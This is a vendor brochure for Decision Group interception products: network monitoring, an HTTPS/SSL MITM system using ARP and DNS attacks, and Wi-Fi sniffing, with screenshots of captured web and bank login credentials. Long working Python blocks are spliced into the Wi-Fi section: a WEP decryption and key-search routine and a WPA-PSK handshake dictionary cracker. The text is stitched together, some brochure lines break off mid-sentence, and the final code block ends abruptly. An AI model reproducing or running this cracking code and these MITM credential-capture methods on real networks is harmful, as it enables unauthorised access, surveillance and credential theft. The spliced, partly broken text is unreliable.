[Screenshot: daily log exported to Excel (20110727.xls, Compatibility Mode) with sheets Summary, POP3, IMAP, SMTP, Webmail (Read), Webmail (Sent), ICQ, YAHOO, QQ, ...; the Summary sheet gives per-category counts and KB totals (e.g. 1425 items, 382912 KB), and the POP3 sheet lists Date, IP (192.168.1.33, 192.168.1.10, 192.168.1.142, 192.168.1.9), account (flyy, vic, peter, lunko) and Subject for each captured mail.]


Wireline Ethernet Interception & Real-Time Reconstruction Series
E-Detective Data Guard System (ED-GS)

Decision Group


Introduction to ED-GS: For …

> Enterprise Protection from Confidential Business Data Breach
> Intranet Deployment at Gateway of Network Segment of Server Farm
> Monitor Transactions of Heterogeneous Databases (MySQL, MS SQL, Oracle DB, DB2, Sybase)
> Monitor File Access Activities of File Servers in MS Network (CIFS)
> Monitor Internal Email Activities (POP3, SMTP, IMAP)
> Transaction Record Provided for Audit
> Personal Data Protection Mandates Fulfillment


Introduction to ED-GS Features

> DB Monitor on Transactions of MySQL, MS SQL Server and Oracle DB
  * SQL Command and Action Record with DB Name, User Account of Network and DB, User IP, Date/Time Stamp
> Internal Email Activity Monitor & Audit
  * Email Content with Sender, cc & bcc List, User IP, Date/Time Stamp and Attached Files
> Access Record and Audit of File Server
  * File Access Record with User Account, IP, File Server Name, Action, Date/Time Stamp
> Full Text Search and Cross-Check
> Online Warning Trigger by Keyword


ED-GS Implementation

[Diagram: ED-GS placed between the Client PCs and the Server Farm (Database Servers, Email Server, ERP Server and File Servers); it mirrors all inbound and outbound data and keeps all activity records of transactions, emails and file access for audit and monitoring.]

Enterprise Data Guard System on Intranet

* Passive Operation
* No Impact on Network Performance
* No Effect on DB
* Well Integration with SIEM
* 1 or 2 Tiers of Infrastructure for Optimization
* ED/GS Must Be Deployed between Servers and User Clients
* At the Gateway of Server Farm
* Acquire Data through Mirror or Forensic port of …


Sample - Database Commands

[Screenshot: SQLLOG list (No., Date-Time, Account, Username, Password, Server, DB, Command, DB Type, Similar, Whois) of MySQL transactions from 192.168.1.199 (user "report") to 192.168.1.85, e.g. SELECT count(*) FROM WEBMAIL; SELECT AUTO, DATETIME, ACCOUNT, ...; SELECT COUNT(AUTO) FROM HTTPLOG; SELECT count(*) FROM HTTPLOG. Total 927, Total Page 186, Current Page 3. SQLLOG Search panel with date range 2012-01-01 to 2012-01-01 and Search Method Exact / Similar.]

> Conditional Search on all DB Transaction Records
> Works on MySQL, MS SQL Server and Oracle DB
> List of all DB Transactions


Sample - MS CIFS Reconstruction

[Screenshot: CIFS list (Date-Time, Account, Username, Action, Server, Path, File Name, Size, Similar, Whois) of file downloads from server 192.168.1.111 on 2012-01-01, e.g. user vic downloading a .doc and a .jpg from a SHARED\... path and user stretch (IPPCLASS) downloading update .tgz packages from PUB\client\...; Total 4, Total Page 1, Current Page 1. CIFS Search panel with Date range, User, Action, File Name and Account fields, each with Search Method Exact / Similar.]

> List of all MS File Server Transactions
> Conditional Search on all MS File Server Transaction Records
> Works on MS Windows File Server and Clients


Wireline Ethernet Interception & Real-Time Reconstruction Series
HTTPS/SSL MITM Interception System

Decision Group
Introduction to HTTPS/SSL MITM Interception

* HTTPS/SSL Interception Appliance (Software + Hardware)
* User can opt to purchase only software from …
* Intercept HTTPS/SSL traffic by MITM attack or by Proxy setup. The HTTPS/SSL MITM Interception system is a standalone system. The HTTPS/SSL Proxy is another standalone system.
* HTTPS/SSL Interception by MITM mode is carried out utilizing both DNS and ARP attacks or utilizing the PBR of the L3/4 switch/router.
* HTTPS web pages on targeted user can be decrypted, decoded and reconstructed. Username and password can also be obtained for Web Login.
* … standard HTTPS/SSL traffic without additional …
* … by Proxy mode requires the targ…


HTTPS/SSL MITM Interception System (Method 1)

[Diagram: HTTPS/SSL Interception By MITM Attack Methodology: web based SSL servers (ex: SSL Google Account, Yahoo Account) on the Internet; Router/Firewall, Server Farm and Switch/Hub on the LAN; the interception system, managed by an Administrator, performs a Man-in-the-Middle attack between the Users and the gateway, with one specific Targeted User. Callout: Intercept and reconstruct HTTPS/SSL traffic. Obtain HTTPS page login username and password. Intercept on specific targets (suspects).]


HTTPS/SSL MITM Interception System (Method 1)

* HTTPS/SSL Interception by MITM mode is carried out utilizing both DNS and ARP attacks. (Methodology 1)
* HTTPS web pages on targeted user can be decrypted, decoded and reconstructed. Username and password can also be obtained for Web Login.
* Target User (Suspect) IP Address must be known or pre-configured in the setup of HTTPS/SSL Interception system.
* Target Website Links (URLs) must also be pre-configured.
* Concurrently attack up to 5 users (Optional for more users).
* … standard HTTPS/SSL traffic without additional …

To view encrypted content, a key is needed.


HTTPS/SSL MITM Interception System (Method 2)

[Diagram: Internet and SSL Web Server at the top; Gateway Routers; the HTTPS MITM system attached to an L3/4 Core Switch with Policy Routing Function; ISP Subscribers Networks below. Callout: Targeted HTTPS traffic needs to be routed or redirected to this MITM system. Note: This is just a sample scaled down diagram for illustration.]


HTTPS/SSL MITM Interception System (Method 2)

* HTTPS MITM Interception System is implemented to decrypt HTTPS traffic (ex: Gmail as target). Subscriber-side HTTPS (ex: Gmail) traffic needs to be rerouted to the HTTPS MITM Interception system. The system has NAT built in that can reroute the traffic to the Web Servers (ex: Gmail).
* For example, traffic to Web Server IP X.X.X.X (ex: Gmail) is redirected (using PBR) to the HTTPS MITM Interception system from the Core Switch (L3/4 switch) or the Core Router at the Subscribers network end.
* HTTPS Web access content (ex: Gmail Read and Sent) of the targeted user can then be reconstructed in real-time by the HTTPS/SSL MITM Interception System.
* Username and Password can also be obtained.
* … this is for … scale … such as …


HTTPS/SSL Proxy Interception System

[Diagram: HTTPS/SSL Interception By Proxy Methodology: web based SSL servers (ex: SSL Google Account, Yahoo Account) and other servers on the Internet; Router/Firewall, Server Farm and Switch/Hub on the LAN; the HTTPS/SSL Proxy (Sniffer Mode + Proxy Mode), managed by an Administrator, sits between the Targeted Users Group and the gateway. Callout: Intercept and reconstruct HTTPS/SSL traffic and protocols/services supported by proxy. Intercept on group of users (with proxy pre-configured on target users' Web Browsers).]


HTTPS/SSL Proxy Interception System

* HTTPS/SSL Interception by Proxy implementation. A proxy pre-configured on the targeted user(s)' Web Browser is required.
* HTTPS/SSL Interception by Proxy implementation can support capturing and reconstruction of other protocols besides HTTPS/SSL traffic. Some supported protocols are: Webmail (Yahoo Mail, Gmail, Hotmail etc.), IM (Yahoo, MSN, ICQ, IRC, QQ, Web MSN, Web Yahoo etc.), HTTP Web Browsing, P2P and Online Games.
* Can be implemented to a group of users (more than 100 concurrent …
* … HTTPS/SSL traffic …

To view encrypted content, a key is needed.


ED2S - Interception of Username & Password

[Screenshot: list of captured logins by Targeted IP with columns No., Date-Time (2010-08-04 13:06:57 to 2010-08-05 14:27:20), User IP (192.168.2.101, 192.168.2.136), Login user name of URL, Login Password of URL, and URLs browsed by Target IP / Description, e.g. https://www.google.com/accounts/ServiceLoginAuth, login.yahoo.com/config/login, www.amazon.com/gp/flex/sign-in/select.html and two bank sign-on pages; Total 11, Total Page 1, Current Page 1.]


Sample Gmail Read Reconstruction

[Screenshot: Webmail (Read) list (Visibility Group: ALL) with No., Date-Time, Account, Sender, Subject, Webmail Type (GMail), e.g. 2011-10-28 20:36:48, account 192.168.1.12, sender t1022@126.com, subject "Bandwidth Monitor Alert"; Total 13, Total Page 2, Current Page 1. Reconstructed message view: subject 434344343, from Decision Group <decisiongroup2010@gmail.com> to Decision Group <decisiongroup2010@gmail.com>, body 3453434534534534, rendered with the Gmail by Google banner.]


Sample Gmail Sent Reconstruction

[Screenshot: Webmail (Sent) list (Visibility Group: ALL) with No., Date-Time, Account, Sender, Password, Receiver, CC, BCC, Subject, Webmail Type (GMail); one record, 2011-10-28 20:37:24, to frankie@deci..., opened via https://192.168.1.60/general/common/mail/openweb.php?...; Total 1, Total Page 1, Current Page 1. Reconstructed message: DATE / TIME: 2011-10-28 20:37:24, TO: frankie@decision-groups.com, SUBJECT: Email from …, body "Hello, This is a message for the XXX> Thanks. Regards, …", rendered with the Gmail by Google banner.]


Wireline Ethernet Interception & Real-Time Reconstruction Series
E-Detective Backup Server (Data Retention)

Decision Group


Introduction to E-Detective Backup Server

* E-Detective Backup Server (BS) is designed for viewing Backup ISO Data (Reconstructed Data backed up by E-Detective System).
* Provides a User Friendly GUI. Easy to import (mount ISO) and view the Backup Content, especially for a large amount of Backup ISO Files.
* Capable of mounting and viewing multiple Backup ISO Files at the same time.
* Works with E-Detective system for Auto FTP Backup function. Allows Auto Backup ISO Files in E-Detective to be stored in Backup Server.
* Search and Advance Search functions provided to search into Backup ISO Content or specific Backup ISO Content.
* Easy Management of Backup ISO Files


Sample Screenshots of ED Backup

[Screenshot: ED Backup Server homepage, ISO File List (Mount ISO File / Delete ISO File / uMount ISO File, Record/Page):

  Status  ISO File Name                   Create Time          Backup Mode  File Size
  1       DC100315NQ8V_M_20100627220342   2010-06-27 22:03:42  Manual       237MB
  2       DC100315NQ8V_M_20100614135017   2010-06-14 13:50:17  Manual       78MB

The ISO file name appears to be composed of the E-Detective unit identifier (DC100315NQ8V), a mode letter and the creation timestamp.]

Page - ISO File Content - Service Categories Statistics

[Screenshot: ISO File Content page (Record/Page: 100, Search / Clear). One row per mounted ISO plus a Summary row, with one column of record counts per service category (mail, chat, file transfer, HTTP link/content/download, video stream, telnet, etc.). The 2010-06-27 ISO holds 57,801 records (including 1,148 HTTP content records), the 2010-06-14 ISO 14,096; summary 71,897.]


Sample Screenshots of ED Backup

[Screenshot: ISO File Content page with the HTTP Content list of the 2010-06-27 ISO opened (1,148 records over 58 pages at 20 per page; account frankie, 2010-06-23 16:59-17:00, mostly advertising hosts such as admeld.com, yieldmanager.com and smartadserver.com). One record is opened in Internet Explorer as the reconstructed web page "Juventus Sign Custodian Marco Storari". IE displays its "blocked this website from displaying content with security certificate errors" bar for the Backup Server's HTTPS site.]


Sample Screenshots of ED Backup - Free Text Search Function

[Screenshot: ISO File Content page after a free text search. The HTTP Link list shows the 16 matching records (No., Date-Time, Account, HOST): 2010-06-23, accounts frankie and defenceorg, all with HOST "Decision Group - E-Detective", one of them titled "Decision Group - E-Detective - Network Forensics | Lawful Interception | Data Retention Solutions".]


Sample Screenshots of ED Backup - Advance Search Function

[Screenshot: Advance Search dialog with Search Parameters (Date, Time, Source IP, Destination IP, Email Address, Subject), Search Category and History. After the search the service statistics shrink to the matching records (Summary 16 0 11 6 66 5 ...) and the HTTP Content list shows the matches: account frankie, 2010-06-23 17:49-17:51, hosts including admeld.com, www.google.com.sg, sensismediasmart.com.au, medrx.sensis.com.au and a "Whois record for 117.4.193.88" page.]


Wireline Ethernet Interception & Real-Time Reconstruction Series
Central Management System (CMS)

Introduction to CMS

> Global view (through a centralized Web GUI portal) of the Internet traffic of a large network, captured by distributed or multiple E-Detective systems (at the same or different locations).

> Status information of all ED, ED2S and ED Backup Server systems.

> Easily aggregate, manage and configure multiple E-Detective systems, ED2S systems (HTTPS/SSL MITM Interception System) and ED Backup Server systems.

> Centralized reporting.


CMS Implementation Architecture

[Diagram: the Center Management System (with its own Data Base and File System) sits above several E-Detective systems, an ED2S system and the Data Retention Management System (each with a Data Base and File System). Arrows labelled Management/Query run from the CMS down to the probes, Data Retention from the probes to the retention tier, and the CMS UI serves the Auditor/User.]

> There are 3 segments/tiers in the entire architecture:

> 1st - Front End Capture/Probes - E-Detective, ED2S (HTTPS/SSL)

> 2nd - Data Retention Management System - ED Backup Server System, Storage


CMS - Sample GUI (1): Homepage

[Screenshot: CMS homepage (menu: Home, Data Management, System Management, Log Out) listing the managed hosts with columns HOST, TYPE, Status, Mail, CHAT, FILE TRANSFER, HTTP, OTHER; one entry, 192.168.1.122 of type ED-DEC, status green, 300 mail records, 0 in the other categories. Footer: Copyright © GROUP INC. All Rights Reserved.]

CMS - Sample GUI (2)

[Screenshot: CMS data view Home > HTTP > 192.168.1.122 with protocol tabs POP3 | IMAP | SMTP | WEBMAILR | WEBMAILS | HTTP, showing a table of mail records (DateTime, Account, From, To, CC, BCC, Subject, Size) dated 2012-01-01 01:15 for account MING302071-PC: messages between decision.com.tw and seed.net.tw addresses, and newsletter/order mails from returnedm@return.pec.pcstore.com.tw and webmail@ecfscop.epaper.com.tw, sizes 4,642 to 280,834 bytes.]


CMS Specifications

Product: Central Management System (CMS)

Features and Specifications

Server Hardware Specifications: HW: Asus RS300 or HP ProLiant DL380/385. Quad-core CPU (Core i3/i5/i7 etc.), 8-16 GB RAM, 2-4 HDDs (2 TB total), 2 Gigabit NIC interfaces (Intel chipset recommended), etc.

System Software Specifications: General implementation.

System Management (Web GUI, IE browser): Aggregate, manage and configure multiple E-Detective systems (20 E-Detective systems at the 1st stage, expandable subsequently).

Centralized total statistical reports from multiple E-Detective systems.

Centralized data query (search).

Centralized alert and notification rules.

Centralized authority management functions.

Others - Optional: Topology mapping.


Wireless LAN (Wi-Fi) Interception & Real-Time Reconstruction Series
Wireless-Detective System

For Government & LEA users!

Introduction to Wireless-Detective System

Wi-Fi / WLAN IEEE 802.11a/b/g/n Interception and Forensics Investigation System

• Scans all WLAN 802.11a/b/g/n 2.4 and 5.0 GHz channels for Access Points and STAs.

• Captures/sniffs WLAN 802.11a/b/g/n packets.

• Real-time decryption of WEP keys (WPA-PSK key recovery is an optional module).

• Real-time reconstruction of WLAN packets.

• Stores data as raw packets and as reconstructed content, reviewed through a Web UI.

The Smallest, Mobile, Portable and most Complete WLAN Lawful Interception System in the World!

Important tool for intelligence agencies such as Police, Military, Forensics, Legal and Lawful Interception Agencies.

Notes: Pictures and logo are property of designated source or


Wireless-Detective - Implementation

Wi-Fi Interception and Investigation - Standalone Architecture

[Diagram: one Wireless-Detective system within range of an Access Point (behind a Router and Firewall) and several Wireless STAs, capturing the WLAN packets transmitted over the air. Range is up to 100 meters or more by using high gain, high sensitivity antennas.]

Wireless-Detective - Implementation

Distributed Architecture Wireless-Detective Deployment

Utilizing multiple/distributed Wireless-Detective systems (Master - Slave) to conduct simultaneous capture, forbidding and location estimation functions.

[Diagram: several Wireless-Detective (Slave) units placed around an Access Point and its Wireless STAs, reporting to a Wireless-Detective (Master) that provides Central Management. A minimum of 2 systems is used for simultaneous (Master & Slaves) capturing/forbidding functions; each unit captures a single channel, a single AP or a single STA.]

Notes: For capturing multiple channels, each Wireless-Detective (WD) can be reconfigured to act as a standalone system. For example: deploy 4 WD systems, each capturing on one single channel.

Wireless-Detective - AP Info - Capture Mode (1)

Displaying information of wireless devices (AP) in the surrounding area.

[Screenshot: Capture page (tabs: Capture / Forbidder / Import / Wepkey / History / Compare / Work Log / IDS / Import & Export Config; MODE: AP or STA; capture By Channel or By Channel + AP; Capture Size, Notification, Filter, Save List, Refresh interval, Auto Stop). The AP table lists 11 access points with columns SCAN, MANUAL, BSSID, CH, MB/S, KEY, STR, BEACONS, PACKETS, ESSID, STA and a Blocking button: APs on channels 1, 2, 6 and 11 at 48-54 Mb/s, KEY shown as WEP, WPA or Unknown, ESSIDs such as 2WIRE..., Hyper, yeoh, dun, Elain, LIM and linksys, 0-1 stations connected each. Count: 11, rows per page 20.]

Obtainable Information: MAC of Wireless AP/Router, Channel, Mbps, Key, Signal Strength, Beacons, Packets, SSID, Number of Stations Connected.
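Every column in the AP table above comes from fields the access point broadcasts in its beacon frames. As an added example (not code from the Decision Group product or this brochure), the Python below builds two constructed beacon frames and parses out exactly those columns: BSSID (Address 3), channel (DS Parameter Set IE), top rate (Supported Rates IEs), SSID, and the key type, which a scanner infers from the RSN IE (WPA2), the Microsoft WPA vendor IE (WPA), or the Privacy capability bit alone (WEP). The 02:00:... locally administered MACs, the SSIDs and the function names are assumptions for the example.

```python
import struct

WPA_OUI_TYPE = b"\x00\x50\xf2\x01"   # Microsoft OUI + type 1 = WPA information element
CAP_PRIVACY = 0x0010                 # Privacy bit of the capability information field


def ie(tag, value):
    """Encode one information element: tag, length, value."""
    return bytes([tag, len(value)]) + value


def build_beacon(bssid, ssid, channel, privacy=False, rsn=False, wpa=False):
    """Constructed beacon frame (no radiotap header): 24-byte MAC header, 12 fixed bytes, then IEs."""
    header = b"\x80\x00" + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"  # FC, duration, DA, SA, BSSID, seq
    capability = 0x0001 | (CAP_PRIVACY if privacy else 0)            # ESS, optionally Privacy
    fixed = struct.pack("<QHH", 0, 100, capability)                    # timestamp, beacon interval, capability
    rates = bytes([0x82, 0x84, 0x8B, 0x96, 0x24, 0x30, 0x48, 0x6C])    # 1/2/5.5/11 (basic) and 18/24/36/54 Mb/s
    body = ie(0, ssid) + ie(1, rates) + ie(3, bytes([channel]))
    if rsn:   # minimal RSN IE: version 1, group CCMP, one pairwise CCMP, one AKM PSK, no capabilities
        body += ie(48, b"\x01\x00" b"\x00\x0f\xac\x04" b"\x01\x00" b"\x00\x0f\xac\x04"
                       b"\x01\x00" b"\x00\x0f\xac\x02" b"\x00\x00")
    if wpa:   # minimal WPA IE: OUI/type, version 1, group TKIP, one pairwise TKIP, one AKM PSK
        body += ie(221, WPA_OUI_TYPE + b"\x01\x00" b"\x00\x50\xf2\x02" b"\x01\x00"
                        b"\x00\x50\xf2\x02" b"\x01\x00" b"\x00\x50\xf2\x02")
    return header + fixed + body


def parse_beacon(frame):
    """Return the scanner columns for one beacon: bssid, channel, max rate, ssid, key type."""
    if len(frame) < 36 or (frame[0] & 0xFC) != 0x80:                   # type management, subtype beacon
        raise ValueError("not a beacon frame")
    bssid = ":".join("%02X" % b for b in frame[16:22])                # Address 3 carries the BSSID
    _timestamp, _interval, capability = struct.unpack_from("<QHH", frame, 24)
    ssid, channel, max_rate, rsn, wpa = "", None, 0, False, False
    pos = 36
    while pos + 2 <= len(frame):                                       # walk the tagged parameters
        tag, length = frame[pos], frame[pos + 1]
        value = frame[pos + 2:pos + 2 + length]
        if len(value) != length:
            raise ValueError("truncated IE %d at offset %d" % (tag, pos))   # malformed frame: stop, do not guess
        pos += 2 + length
        if tag == 0:
            ssid = value.decode("utf-8", "replace")
        elif tag in (1, 50):                                           # supported / extended rates, 0.5 Mb/s units
            max_rate = max([max_rate] + [(r & 0x7F) / 2 for r in value])
        elif tag == 3 and length >= 1:
            channel = value[0]
        elif tag == 48:
            rsn = True
        elif tag == 221 and value[:4] == WPA_OUI_TYPE:
            wpa = True
    if rsn:
        key = "WPA2"
    elif wpa:
        key = "WPA"
    elif capability & CAP_PRIVACY:
        key = "WEP"                                                    # privacy set but no RSN/WPA IE
    else:
        key = "Open"
    if ssid == "" or set(ssid) == {"\x00"}:
        ssid = "<hidden>"                                              # cloaked SSID: only probe responses reveal it
    return {"bssid": bssid, "channel": channel, "max_rate_mbps": max_rate, "ssid": ssid, "key": key}


# Constructed sample frames (not captures from the brochure)
SAMPLE_FRAMES = [
    build_beacon(bytes.fromhex("020000000001"), b"2WIRE", 6, privacy=True),
    build_beacon(bytes.fromhex("020000000002"), b"linksys", 6, privacy=True, rsn=True),
    build_beacon(bytes.fromhex("020000000003"), b"", 11),
]

if __name__ == "__main__":
    for sample in SAMPLE_FRAMES:
        print(parse_beacon(sample))
```

The parser refuses a beacon whose last IE is cut short instead of silently using partial data; a scanner that feeds attacker-controlled frames into a key column (the KEY, ESSID and STR fields all come straight from the air) should treat every length byte as untrusted.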


Wireless-Detective - STA Info - Capture Mode (2)

Displaying information of wireless devices (STA) in the surrounding area.

[Screenshot: Capture page in STA mode (Hard Disk Information: 146G total / 3.3G used / 136G available / 97% available). The STA table lists 9 clients with columns SCAN, MANUAL, CLIENT MAC, STR, PACKETS, BSSID, KEY, CH, ESSID and Blocking: clients associated to the WPA AP "linksys" (channel 6) and the WEP AP "LIM" (channel 11), and unassociated clients whose BSSID is the broadcast address FF:FF:FF:FF:FF:FF with channel -1 (probe requests). Count: 9, rows per page 20.]

Obtainable Information: Client MAC Address, Signal Strength, Packets, AP MAC Address, Key (Encrypted or Unencrypted), SSID.

Cracking/Decryption of WEP/WPA

1) WEP Key Cracking/Decryption (64-bit and 128-bit keys):
   Active Crack - utilizing ARP packet injection to stimulate traffic; automatic cracking (system default) or manual cracking.
   Passive Crack - silently collect Wireless LAN packets.
   64-bit key - 10 HEX digits
   128-bit key - 26 HEX digits
   (The hex digits are the secret part of the key, 40 or 104 bits; the remaining 24 bits of the 64/128-bit RC4 key are the per-packet IV sent in clear, and the reuse of that small IV space is what makes statistical key recovery from captured traffic possible.)

2) WPA-PSK Key Cracking/Decryption (Optional Module Available):
   WPA-PSK cracking is an optional module. By using an external cracking server with a Smart Password List and GPU Acceleration Technology, the WPA-PSK key can be recovered/cracked.

Notes:

The time taken to decrypt the WEP key in passive mode depends on the amount of network activity.

The time to crack a WPA-PSK key depends on the length and complexity of the key. (The PSK is derived from the passphrase with PBKDF2-HMAC-SHA1 over the SSID at 4096 iterations, so each dictionary candidate costs about 8,192 HMAC operations and the work is per SSID, which is why GPU acceleration matters.)
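The "10 HEX / 26 HEX" key sizes and the passive decryption above are easiest to understand by decrypting a frame by hand. As an added example (not Decision Group's code), the Python below implements WEP as deployed: the frame body is IV(3) | KeyID(1) | RC4(IV || key, data || CRC-32 ICV), and a candidate key is accepted exactly when the decrypted ICV matches, which is the final check every WEP cracker performs. The ARP plaintext, the IV and the key 1234567890 (the value shown in a later screenshot) are constructed sample data; function names are assumptions for the example.

```python
import zlib


def wep_key_from_hex(hex_key):
    """Accept the two key sizes the brochure lists: WEP-64 = 10 hex digits, WEP-128 = 26 hex digits."""
    try:
        key = bytes.fromhex(hex_key)
    except ValueError:
        raise ValueError("WEP key must be hexadecimal: %r" % hex_key)
    if len(key) not in (5, 13):
        raise ValueError("WEP key must be 10 or 26 hex digits, got %d" % len(hex_key))
    return key


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); WEP seeds it with IV || secret key, so the first 3 key bytes are public."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key, iv, plaintext, key_id=0):
    """Frame body = IV(3) | KeyID<<6 (1) | RC4(IV||key, plaintext || CRC-32 ICV little-endian)."""
    if len(iv) != 3 or not 0 <= key_id <= 3:
        raise ValueError("IV must be 3 bytes and key id 0..3")
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + bytes([key_id << 6]) + rc4(iv + key, plaintext + icv)


def wep_decrypt(key, body):
    """Decrypt a WEP frame body; return the plaintext, or None if the ICV does not match (wrong key).
    The KeyID byte selects one of four configured keys; this example assumes a single key."""
    if len(body) < 8:
        raise ValueError("WEP body too short")
    iv, ciphertext = body[:3], body[4:]
    plaintext = rc4(iv + key, ciphertext)
    data, icv = plaintext[:-4], plaintext[-4:]
    if zlib.crc32(data).to_bytes(4, "little") != icv:
        return None
    return data


def find_wep_key(body, candidate_hex_keys):
    """Last step of any WEP cracker: a candidate key is confirmed when decryption yields a valid ICV."""
    for hex_key in candidate_hex_keys:
        try:
            key = wep_key_from_hex(hex_key)
        except ValueError:
            continue                      # malformed candidate, e.g. from a dictionary line
        if wep_decrypt(key, body) is not None:
            return hex_key
    return None


# Constructed sample: an ARP request (LLC/SNAP + ARP) encrypted under the 40-bit key 1234567890 with IV 01:02:03
SAMPLE_PLAINTEXT = (
    b"\xaa\xaa\x03\x00\x00\x00\x08\x06"                       # LLC/SNAP header, EtherType ARP
    b"\x00\x01\x08\x00\x06\x04\x00\x01"                       # ARP: Ethernet/IPv4, request
    b"\x02\x00\x00\x00\x00\x02" b"\xc0\xa8\x01\x0b"           # sender 02:00:00:00:00:02, 192.168.1.11
    b"\x00\x00\x00\x00\x00\x00" b"\xc0\xa8\x01\x01"           # target unknown, 192.168.1.1
)
SAMPLE_KEY_HEX = "1234567890"
SAMPLE_BODY = wep_encrypt(wep_key_from_hex(SAMPLE_KEY_HEX), b"\x01\x02\x03", SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print(find_wep_key(SAMPLE_BODY, ["0000000000", "abcdef1234", SAMPLE_KEY_HEX]))
```

Two caveats for anyone using the ICV as a key check: a wrong key passes it with probability 2^-32 per frame, so confirm on two frames before reporting a key; and because CRC-32 is linear, a valid ICV says nothing about integrity, which is why an interceptor must not treat decrypted WEP content as tamper-evident.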


Cracking/Decryption of WEP Key

Automatic: the system auto cracks/decrypts the WEP key (default).
Manual: capture raw data and crack/decrypt the WEP key.

[Screenshot: Capture page in AP mode (Hard Disk Information: 146G total / 3.3G used / 136G available / 97%). The left-hand menu lists the reconstructed categories with record counts: POP3, SMTP, IMAP (14), WEBMAIL (READ), WEBMAIL (SENT), MSN (18), ICQ (7), YAHOO, QQ (10), UT (1), SKYPE (3), GOOGLETALK (1), IRC (2), FTP (22), P2P (13), GAME (3), HTTP (LINK) (1322), HTTP (CONTENT), HTTP (DOWNLOAD), HTTP (RECONSTR...), VIDEO STREAM (35), TELNET (44), SEARCH. In the AP table the KEY column now shows the recovered key next to the cipher, e.g. "WEP 1234567890" for a 2WIRE AP on channel 6; 15 APs over 2 pages, rows per page 10.]


Wireless-Detective - WPA-PSK Cracking Sol.

[Diagram: distributed Wireless-Detective (Slave) units around an Access Point and Wireless STAs, with a Wireless-Detective (Master) forwarding the raw data packets containing the handshake packets to the WPA-PSK Cracking Solution, implemented as a single server or as distributed servers.]

WPA handshake packets need to be captured for cracking the WPA key. (Any two consecutive messages of the four-way handshake together with the SSID are enough to test candidate passphrases offline; no further traffic from the network is needed.)

Utilize a single server or distributed servers (multiple smart password list attacks running simultaneously) to crack the WPA key.

Distributed Password List/Dictionary Cracking; GPU acceleration technology is used for WPA-PSK or WPA2-PSK key cracking.

Note: WPA handshake packets can be captured by standalone or distributed Wireless-Detective systems.

This is an optional feature! An additional system is required! Please contact Decision Group for more information.
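The two WPA-PSK passages above (the cracking notes and the cracking solution) state that the handshake must be captured and that cracking time depends on passphrase length and complexity. As an added example (neither Decision Group's nor Elcomsoft's code), the Python below performs the offline check a dictionary attack runs per candidate: passphrase to PMK with PBKDF2-HMAC-SHA1 over the SSID, PMK to PTK with the 802.11i PRF-384 over both MACs and both nonces, then recomputation of the EAPOL-Key MIC of handshake message 2 with the KCK. The handshake is constructed inline (SSID "cuckoo" as in the screenshot, locally administered MACs, fixed nonces, a passphrase placed in the wordlist); the function names are assumptions for the example.

```python
import hashlib
import hmac

MIC_OFFSET = 81   # EAPOL header (4) + descriptor type, key info, key length, replay counter, nonce, IV, RSC, ID (77)


def pmk_from_passphrase(passphrase, ssid):
    """802.11i passphrase mapping: PBKDF2-HMAC-SHA1, salt = SSID, 4096 iterations, 256-bit PMK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """PRF-384 over the ordered MAC and nonce pairs; returns KCK(16) | KEK(16) | TK(16)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(3))
    return out[:48]


def eapol_mic(kck, eapol):
    """Recompute the Key MIC over the EAPOL-Key frame with its MIC field zeroed."""
    version = int.from_bytes(eapol[5:7], "big") & 0x07       # key descriptor version, Key Information bits 0-2
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:                                          # WPA/TKIP: HMAC-MD5
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:                                          # WPA2/CCMP: HMAC-SHA1 truncated to 128 bits
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("key descriptor version %d (AES-128-CMAC) not implemented" % version)


def crack_wpa_psk(handshake, wordlist):
    """Return the first candidate passphrase whose derived KCK reproduces the captured MIC, else None."""
    captured_mic = handshake["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:                     # outside the valid passphrase range: skip the PBKDF2 cost
            continue
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        kck = ptk_from_pmk(pmk, handshake["aa"], handshake["spa"], handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), captured_mic):
            return candidate
    return None


def build_msg2(snonce, mic=b"\x00" * 16):
    """Constructed EAPOL-Key message 2 (supplicant -> AP): RSN descriptor, pairwise, MIC bit, version 2."""
    key_info = (0x0100 | 0x0008 | 0x0002).to_bytes(2, "big")  # MIC | pairwise | descriptor version 2
    body = (b"\x02" + key_info + b"\x00\x00" + (1).to_bytes(8, "big") + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + b"\x00\x00")
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body    # EAPOL version 1, type EAPOL-Key


# Constructed capture (not from the brochure): SSID from the screenshot, locally administered MACs, fixed nonces
SSID = "cuckoo"
AA, SPA = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
_TRUE_PASSPHRASE = "passw0rd123"
_kck = ptk_from_pmk(pmk_from_passphrase(_TRUE_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16]
SAMPLE_HANDSHAKE = {
    "ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
    "eapol": build_msg2(SNONCE, eapol_mic(_kck, build_msg2(SNONCE))),
}
WORDLIST = ["password", "12345678", "cuckoo2010", "letmein", "passw0rd123", "qwertyuiop"]

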